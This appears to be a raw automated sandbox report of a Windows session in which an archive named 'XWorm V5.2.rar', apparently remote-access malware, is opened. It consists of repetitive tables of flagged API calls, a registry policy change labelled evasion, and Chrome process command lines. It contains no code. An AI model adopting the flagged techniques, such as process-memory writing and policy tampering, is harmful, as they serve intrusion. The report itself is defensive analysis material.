N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-701.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-701.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3396 wrote to memory of 2392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 2392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 3228 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3396 wrote to memory of 456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.rar"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4228 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3252 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3256 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1748 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3612 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2548 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4376 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2460 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

